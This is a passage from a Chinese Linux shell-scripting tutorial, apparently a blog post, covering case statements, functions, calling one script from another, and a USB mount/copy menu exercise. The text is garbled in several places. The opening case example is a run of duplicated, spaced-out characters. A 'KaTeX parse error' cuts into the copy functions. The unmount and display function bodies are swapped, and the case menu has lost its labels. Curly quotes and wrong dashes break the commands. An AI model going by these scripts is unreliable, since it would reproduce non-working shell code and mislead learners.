case U S E R i n b e e c h e n ) e c h o “ Y o u a r e b e i c h e n ! ” ; ; l i a n g n i a n ) e c h o “ Y o u a r e l i a n g n i a n ” ; / / 注 意 这 里 只 有 一 个 分 号 e c h o “ W e l c o m e ! ” ; ; / / 这 里 才 是 两 个 分 号 r o o t ) e c h o “ Y o u a r e r o o t ! ” ; e c h o “ W e l c o m e ! ” ; ; / / 将 两 命 令 写 在 一 行 , 用 一 个 分 号 作 为 分 隔 符 ∗ ) e c h o “ W h o a r e y o u ? USER in beechen) echo “You are beichen!”;; liangnian) echo “You are liangnian”; //注意这里只有一个分号 echo “Welcome !”;; //这里才是两个分号 root) echo “You are root!”;echo “Welcome !”;; //将两命令写在一行,用一个分号作为分隔符 *) echo “Who are you? USERinbeechen)echoYouarebeichen!;;liangnian)echoYouareliangnian;//echoWelcome!;;//rootechoYouareroot!;echoWelcome!;;//echoWhoareyou?USER?”;;
easc
(2)设置权限
[root@localhost bin]#chmod +x test17
(3)执行
[root@localhost bin]#./ test17
You are root
Welcome!
在Shell脚本中使用函数

u Shell的函数
Shell程序也支持函数。函数能完成一特定的功能,可以重复调用这个函数。
函数格式如下:
函数名( )
{
函数体
}
函数调用方式为
函数名 参数列表
实例 12-19:编写一函数add求两个数的和,这两个数用位置参数传入,最后输出结果。
(1)编辑代码
[root@localhost bin]#gedit test18
#!/bin/sh
add()
{
a=$1
b=$2
z=’expr $a + $b’
echo “The sum is $z”
}
add $1 $2
(2)设置权限
[root@localhost bin]#chmod +x test18
(3)执行
[root@localhost bin]#./ test18 10 20
The sum is 30
注意:
函数定义完成后必须同时写出函数的调用,然后对此文件进行权限设定,在执行此文件。

在Shell脚本中调用其他脚本

u Shell脚本的调用
在Shell脚本的执行过程中,Shell脚本支持调用另一个Shell脚本,调用的格式为:
程序名
实例 12-20:在Shell脚本test19中调用test20。
(1)调用test20
#test19脚本
#!/bin/sh
echo “The main name is $0”
./test20
echo “The first string is $1”
#test20脚本
#!/bin/sh
echo “How are you $USER?”
(2)设置权限
[root@localhost bin]#chmod +x test19
[root@localhost bin]#chmod +x test20
(3)执行
[root@localhost bin]#./ test19 abc123
The main name is ./test19
How are you root?
the first string is abc123
注意:
1)在Linux编辑中命令区分大小写字符。
2)在Shell语句中加入必要的注释,以便以后查询和维护,注释以#开头。
3)对Shell变量进行数字运算时,使用乘法符号“*”时,要用转义字符“\”进行转义。
4)由于Shell对命令中多余的空格不进行任何处理,因此程序员可以利用这一特性调整程序缩进,达到增强程序可读性效果。
5)在对函数命名时最好能使用有含义且能容易理解的名字,即使函数名能够比较准确地表达函数所完成的任务。同时建议对于较大的程序要建立函数名和变量命名对照表。

本章小结
本章讲解了Linux下Shell脚本的定义和相关Shell脚本编写的基础,这些基础知识是学习Shell脚本编程的关键。接着讲解了Shell 脚本的执行方式和Shell脚本的常见流程控制,为Shell脚本的编程做了准备。

课程实训
实训内容:编写一个Shell程序,呈现一个菜单,有0-5共6个命令选项,1为挂载U盘,2为卸载U盘,3为显示U盘的信息,4把硬盘中的文件拷贝到U盘,5把U盘中的文件拷贝到硬盘中,选0为退出。
程序分析:把此程序分成题目中要求的6大功能模块,另外加一个菜单显示及选择的主模板。
(1) 编辑代码
[root@localhost bin]#vi test19
#!/bin/sh
#mountusb.sh
#退出程序函数
quit()
{
clear
echo “*************************************************************
echo “
thank you to use,Good bye! ****”
exit 0
}
#加载U盘函数
mountusb()
{
clear
#在/mnt下创建usb目录
mkdir /mnt/usb
#查看U盘设备名称
/sbin/fdisk –l |grep /dev/sd
echo –e “Please Enter the device name of usb as shown above:\c”
read PARAMETER
mount /dev/$PARAMETER /mnt/usb
}
#卸载U盘函数
umountusb()
{
clear
ls -la /mnt/usb
}
#显示U盘信息函数
display()
{
clear
umount /mnt/usb
}
#拷贝硬盘文件到U盘函数
cpdisktousb()
{
clear
echo –e “Please Enter the filename to be Copide (under Current directory):\c”
read FILE
echo “Copying,please wait!..”
cp KaTeX parse error: Expected 'EOF', got '}' at position 15: FILE /mnt/usb }̲ #拷贝U盘函数到硬盘文件 c…FILE . #点(.)表示当前路径
}
clear
while true
do
echo “=============
echo “
LINUX USB MANAGE PROGRAM ***”
echo “ 1-MOUNT USB ”
echo “ 2-UNMOUNT USB ”
echo “ 3-DISPLAY USB INFORMATION ”
echo “ 4-COPY FILE IN DISK TO USB ”
echo “ 5-COPY FILE IN USB TO DISK ”
echo “ 0-EXIT ”
echo “=============”
echo –e “Please Enter a Choice(0-5):\c”
read CHOICE
case $CHOICE in

  1. mountusb
  2. unmountusb
  3. display
  4. cpdisktousb
  5. cpusbtodisk
  6. quit
    *) echo “Invalid Choice!Corrent Choice is (0-5)”
    sleep 4
    clear;;
    esac
    done
    (2)修改权限
    [root@localhost bin]#chmod +x test19
    (3)程序执行结果
    [root@localhost bin]#./ test19
已标记关键词 清除标记
相关推荐
©️2020 CSDN 皮肤主题: 1024 设计师:白松林 返回首页